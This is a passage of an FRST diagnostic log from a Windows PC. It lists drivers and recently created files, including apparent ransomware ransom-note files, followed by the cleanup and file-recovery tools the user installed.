S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\VirusDefs\20140803.034\ENG64.SYS [126040 2014-08-03] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_18.0.0.128\Definitions\VirusDefs\20140803.034\EX64.SYS [2099288 2014-08-03] (Symantec Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
S3 RSUSBSTOR; C:\Windows\SysWOW64\Drivers\RtsUStor.sys [225280 2009-09-23] (Realtek Semiconductor Corp.)
R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [9101016 2014-12-11] (Realtek Semiconductor Corp.)
R2 sbapifs; C:\Windows\System32\DRIVERS\sbapifs.sys [88928 2013-10-01] (ThreatTrack Security, Inc.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2014-12-21] (Synaptics Incorporated)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1207020.003\SRTSP64.SYS [744568 2011-03-31] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1207020.003\SRTSPX64.SYS [40568 2011-03-31] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1207020.003\SYMDS64.SYS [450680 2011-01-27] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1207020.003\SYMEFA64.SYS [912504 2011-03-15] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [174200 2014-06-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1207020.003\Ironx64.SYS [171128 2011-01-27] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NISx64\1207020.003\SYMNETS.SYS [386168 2011-04-21] (Symantec Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-01 21:50 - 2015-06-01 21:50 - 00027331 _____ () C:\Users\Giovanni\Downloads\FRST.txt
2015-06-01 21:50 - 2015-06-01 21:50 - 00000000 ____D () C:\FRST
2015-06-01 21:49 - 2015-06-01 21:49 - 02108928 _____ (Farbar) C:\Users\Giovanni\Downloads\FRST64.exe
2015-06-01 21:49 - 2015-06-01 21:49 - 01147392 _____ (Farbar) C:\Users\Giovanni\Downloads\FRST.exe
2015-06-01 21:14 - 2015-06-01 21:30 - 00000000 ___SD () C:\ComboFix
2015-06-01 21:14 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-06-01 21:14 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-06-01 21:14 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2015-06-01 20:50 - 2015-06-01 21:14 - 00000000 ____D () C:\Qoobox
2015-06-01 20:47 - 2015-06-01 20:47 - 00000000 ____D () C:\Windows\erdnt
2015-06-01 20:46 - 2015-06-01 20:46 - 05628238 ____R (Swearware) C:\Users\Giovanni\Downloads\ComboFix.exe
2015-06-01 20:34 - 2015-06-01 20:34 - 00000000 ____D () C:\5e100decb1573396b5b43467defb2a
2015-06-01 20:33 - 2015-06-01 20:33 - 00001912 _____ () C:\Windows\epplauncher.mif
2015-06-01 20:30 - 2015-06-01 20:30 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2015-06-01 20:29 - 2015-06-01 20:29 - 00079064 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\bdpb.sys
2015-06-01 20:29 - 2015-06-01 20:29 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2015-06-01 20:28 - 2015-06-01 20:30 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2015-06-01 20:27 - 2015-06-01 20:33 - 00000000 ____D () C:\88ca8d9982f9f69a71
2015-06-01 20:26 - 2015-06-01 20:27 - 14259384 _____ (Microsoft Corporation) C:\Users\Giovanni\Downloads\mseinstall.exe
2015-06-01 20:26 - 2015-06-01 20:27 - 14259384 _____ (Microsoft Corporation) C:\Users\Giovanni\Downloads\mseinstall (1).exe
2015-06-01 20:23 - 2015-06-01 20:23 - 00000000 ____D () C:\Windows\system32\log
2015-06-01 20:23 - 2015-05-27 12:02 - 00053568 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2015-06-01 20:23 - 2015-04-17 04:43 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2015-06-01 20:22 - 2015-06-01 20:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YAC
2015-06-01 20:22 - 2015-06-01 20:22 - 00001902 _____ () C:\Users\Public\Desktop\YAC.lnk
2015-06-01 20:22 - 2015-06-01 20:22 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Elex-tech
2015-06-01 20:22 - 2015-06-01 20:22 - 00000000 ____D () C:\Program Files (x86)\Elex-tech
2015-06-01 20:21 - 2015-06-01 20:21 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\eCyber
2015-06-01 20:20 - 2015-06-01 20:21 - 00864648 _____ () C:\Users\Giovanni\Downloads\yet_another_cleaner_sk_6130172.exe
2015-06-01 20:18 - 2015-06-01 20:18 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\www.shadowexplorer.com
2015-06-01 20:17 - 2013-09-04 14:57 - 00031264 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2015-06-01 20:17 - 2013-05-23 08:39 - 00041032 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2015-06-01 20:16 - 2015-06-01 20:16 - 00001885 _____ () C:\Users\Giovanni\Desktop\ShadowExplorer.lnk
2015-06-01 20:16 - 2015-06-01 20:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ShadowExplorer
2015-06-01 20:16 - 2015-06-01 20:16 - 00000000 ____D () C:\Program Files (x86)\ShadowExplorer
2015-06-01 20:14 - 2015-06-01 20:14 - 00969845 _____ (ShadowExplorer.com ) C:\Users\Giovanni\Downloads\ShadowExplorer-0.9-setup.exe
2015-06-01 20:11 - 2015-06-01 20:12 - 00000000 ____D () C:\Program Files\Recuva
2015-06-01 20:11 - 2015-06-01 20:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
2015-06-01 20:10 - 2015-06-01 20:10 - 04426120 _____ (Piriform Ltd) C:\Users\Giovanni\Downloads\rcsetup152.exe
2015-06-01 20:08 - 2013-10-01 16:31 - 00063184 _____ (GFI Software) C:\Windows\system32\Drivers\sbhips.sys
2015-06-01 20:07 - 2015-06-01 20:07 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Enigma Software Group
2015-06-01 20:06 - 2015-06-01 20:50 - 00000000 ____D () C:\ProgramData\STOPzilla!
2015-06-01 20:06 - 2015-06-01 20:17 - 00000000 ____D () C:\Program Files (x86)\STOPzilla
2015-06-01 20:06 - 2015-06-01 20:06 - 00022704 _____ () C:\Windows\system32\Drivers\EsgScanner.sys
2015-06-01 20:06 - 2015-06-01 20:06 - 00003344 _____ () C:\Windows\System32\Tasks\SpyHunter4Startup
2015-06-01 20:06 - 2015-06-01 20:06 - 00001087 _____ () C:\Users\Giovanni\Desktop\SpyHunter.lnk
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\sh4ldr
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\STOPzilla
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\Program Files\Enigma Software Group
2015-06-01 20:06 - 2013-10-01 16:31 - 00260816 _____ (GFI Software) C:\Windows\system32\Drivers\SbFw.sys
2015-06-01 20:06 - 2013-03-26 15:58 - 00120608 _____ (GFI Software) C:\Windows\system32\Drivers\SbFwIm.sys
2015-06-01 20:04 - 2015-06-01 20:04 - 03109248 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-Installer (2).exe
2015-06-01 20:03 - 2015-06-01 20:04 - 02042328 _____ (iS3, Inc.) C:\Users\Giovanni\Downloads\STOPzillaPRO_Downloader.exe
2015-06-01 19:58 - 2015-06-01 19:58 - 03109248 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-Installer (1).exe
2015-06-01 19:44 - 2015-06-01 19:44 - 03148854 _____ () C:\Users\Giovanni\Documents\!Decrypt-All-Files-xjryulf.bmp
2015-06-01 19:44 - 2015-06-01 19:44 - 00001322 _____ () C:\Users\Giovanni\Documents\!Decrypt-All-Files-xjryulf.txt
2015-06-01 19:29 - 2015-06-01 19:44 - 00827977 _____ () C:\ProgramData\zvcisfg.html
2015-06-01 19:26 - 2015-06-01 19:26 - 00002872 _____ () C:\Windows\System32\Tasks\rpzbcmg
2015-06-01 19:26 - 2015-06-01 19:26 - 00000000 ___HD () C:\95da42f1
2015-06-01 19:14 - 2015-06-01 19:14 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\UXFmedia
2015-06-01 19:13 - 2015-06-01 19:13 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\YgfnPack
2015-06-01 17:31 - 2015-06-01 18:00 - 00000000 ____D () C:\Users\Giovanni\Downloads\Fury 2014
2015-06-01 09:20 - 2015-06-01 09:20 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\GWX
2015-05-26 11:50 - 2015-05-26 11:50 - 00000000 ____D () C:\Windows\System32\Tasks\Games
2015-05-25 08:27 - 2015-06-01 09:04 - 00000784 _____ () C:\Windows\setupact.log
2015-05-25 08:27 - 2015-05-25 08:27 - 00000000 _____ () C:\Windows\setuperr.log
2015-05-25 08:26 - 2015-05-25 08:26 - 00005110 _____ () C:\Windows\PFRO.log
2015-05-25 08:26 - 2015-05-25 08:26 - 00000000 ____H () C:\asc_rdflag
2015-05-19 11:11 - 2015-05-19 11:11 - 01513488 _____ (Dummy, Ltd.) C:\Users\Giovanni\Downloads\rulers of nations geopolitical simulator 2_10924_i9759006_il345.exe
2015-05-19 11:11 - 2015-05-19 11:11 - 00019991 _____ () C:\Users\Giovanni\Downloads\Surgeon.Simulator.2013..April.19..2013..torrent
2015-05-19 08:26 - 2015-05-01 15:17 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-19 08:26 - 2015-05-01 15:16 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-05-16 09:44 - 2015-05-05 03:29 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-05-16 09:43 - 2015-05-05 03:12 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-05-16 09:43 - 2015-04-18 05:10 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2015-05-16 09:43 - 2015-04-18 04:56 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2015-05-16 09:42 - 2015-04-22 04:28 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-05-16 09:42 - 2015-04-22 03:48 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-05-16 09:42 - 2015-04-21 19:14 - 24971776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-05-16 09:42 - 2015-04-21 19:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-05-16 09:42 - 2015-04-21 19:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-05-16 09:42 - 2015-04-21 18:51 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-05-16 09:42 - 2015-04-21 18:50 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-05-16 09:42 - 2015-04-21 18:50 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-05-16 09:42 - 2015-04-21 18:50 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-05-16 09:42 - 2015-04-21 18:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-05-16 09:42 - 2015-04-21 18:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-05-16 09:42 - 2015-04-21 18:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-05-16 09:42 - 2015-04-21 18:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-05-16 09:42 - 2015-04-21 18:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-05-16 09:42 - 2015-04-21 18:35 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-05-16 09:42 - 2015-04-21 18:35 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-05-16 09:42 - 2015-04-21 18:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-05-16 09:42 - 2015-04-21 18:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-05-16 09:42 - 2015-04-21 18:31 - 06025728 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-05-16 09:42 - 2015-04-21 18:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-05-16 09:42 - 2015-04-21 18:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-05-16 09:42 - 2015-04-21 18:24 - 19691008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-05-16 09:42 - 2015-04-21 18:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-05-16 09:42 - 2015-04-21 18:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-05-16 09:42 - 2015-04-21 18:11 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-05-16 09:42 - 2015-04-21 18:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-05-16 09:42 - 2015-04-21 18:10 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-05-16 09:42 - 2015-04-21 18:09 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-05-16 09:42 - 2015-04-21 18:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-05-16 09:42 - 2015-04-21 18:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-05-16 09:42 - 2015-04-21 18:08 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-05-16 09:42 - 2015-04-21 18:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-05-16 09:42 - 2015-04-21 18:04 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-05-16 09:42 - 2015-04-21 18:03 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-05-16 09:42 - 2015-04-21 18:02 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-05-16 09:42 - 2015-04-21 18:00 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-05-16 09:42 - 2015-04-21 17:58 - 00664576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-05-16 09:42 - 2015-04-21 17:58 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-05-16 09:42 - 2015-04-21 17:57 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-05-16 09:42 - 2015-04-21 17:49 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-05-16 09:42 - 2015-04-21 17:49 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-05-16 09:42 - 2015-04-21 17:48 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-05-16 09:42 - 2015-04-21 17:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-05-16 09:42 - 2015-04-21 17:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-05-16 09:42 - 2015-04-21 17:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-05-16 09:42 - 2015-04-21 17:40 - 14401536 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-05-16 09:42 - 2015-04-21 17:39 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-05-16 09:42 - 2015-04-21 17:38 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-05-16 09:42 - 2015-04-21 17:36 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-05-16 09:42 - 2015-04-21 17:31 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-05-16 09:42 - 2015-04-21 17:27 - 02352128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-05-16 09:42 - 2015-04-21 17:26 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-05-16 09:42 - 2015-04-21 17:25 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-05-16 09:42 - 2015-04-21 17:24 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-05-16 09:42 - 2015-04-21 17:17 - 12828672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-05-16 09:42 - 2015-04-21 17:15 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-05-16 09:42 - 2015-04-21 17:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-05-16 09:42 - 2015-04-21 17:02 - 01882112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-05-16 09:42 - 2015-04-21 16:58 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-05-16 09:42 - 2015-04-21 16:56 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-05-16 09:41 - 2015-04-20 05:17 - 01647104 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-05-16 09:41 - 2015-04-20 05:17 - 01179136 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-05-16 09:41 - 2015-04-20 04:56 - 01250816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-05-16 09:41 - 2015-04-20 04:11 - 03204608 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-05-16 09:41 - 2015-04-13 05:28 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-05-16 09:41 - 2015-04-08 05:29 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2015-05-16 09:41 - 2015-04-08 05:14 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2015-05-13 18:08 - 2015-06-01 19:30 - 00000000 ____D () C:\Users\Giovanni\Documents\Masters of the World
2015-05-13 18:05 - 2015-06-01 19:28 - 00000000 ____D () C:\Program Files (x86)\Xvid
2015-05-13 18:05 - 2015-05-13 18:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xvid
2015-05-13 18:05 - 2011-05-30 15:42 - 00255488 _____ () C:\Windows\system32\xvidvfw.dll
2015-05-13 18:05 - 2011-05-30 15:42 - 00240640 _____ () C:\Windows\SysWOW64\xvidvfw.dll
2015-05-13 18:05 - 2011-05-23 11:52 - 00153088 _____ () C:\Windows\SysWOW64\xvid.ax
2015-05-13 18:05 - 2011-05-23 09:49 - 00173568 _____ () C:\Windows\system32\xvid.ax
2015-05-13 18:05 - 2011-05-23 09:46 - 00645632 _____ () C:\Windows\SysWOW64\xvidcore.dll
2015-05-13 18:05 - 2011-05-23 09:45 - 00696832 _____ () C:\Windows\system32\xvidcore.dll
2015-05-13 18:04 - 2015-05-13 18:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Masters of the World
2015-05-13 18:04 - 2015-05-13 18:07 - 00601847 _____ () C:\Windows\MOW 2013 ENGLISH DL Uninstaller.exe
2015-05-13 18:04 - 2015-05-13 18:04 - 00001977 _____ () C:\Users\Public\Desktop\Masters of the World.lnk
2015-05-13 18:03 - 2015-06-01 19:43 - 00000000 ____D () C:\Program Files (x86)\Masters of the World
2015-05-13 17:42 - 2015-05-13 17:46 - 00000000 ____D () C:\Users\Giovanni\Downloads\Masters.Of.The.World.Geopolitical.Simulator.3.PROPER-CPY
2015-05-13 17:39 - 2015-05-13 17:39 - 00018491 _____ () C:\Users\Giovanni\Downloads\masters-of-the-world-geopolitical-simulator-3-englishpcdvdskidrowwwwgamestorrentsco..torrent
2015-05-11 16:42 - 2015-05-11 16:42 - 00100716 _____ () C:\Users\Giovanni\Downloads\Cass._pen._2014_su_operazioni_dolose.htm
2015-05-11 12:33 - 2015-05-11 12:33 - 00241328 _____ () C:\Users\Giovanni\Downloads\Responsabilità_amministratori_privi_di_delega_-_Conoscenza_-_Conoscibilità.htm
2015-05-11 12:33 - 2015-05-11 12:33 - 00077420 _____ () C:\Users\Giovanni\Downloads\C.d.A._Responsabilità_degli_amministratori_privi_di_delega.htm
2015-05-10 09:33 - 2015-05-10 09:33 - 05569984 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 03989440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 03934144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 01728960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01310744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01254400 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-05-10 09:33 - 2015-05-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-05-10 09:33 - 2015-05-10 09:33 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
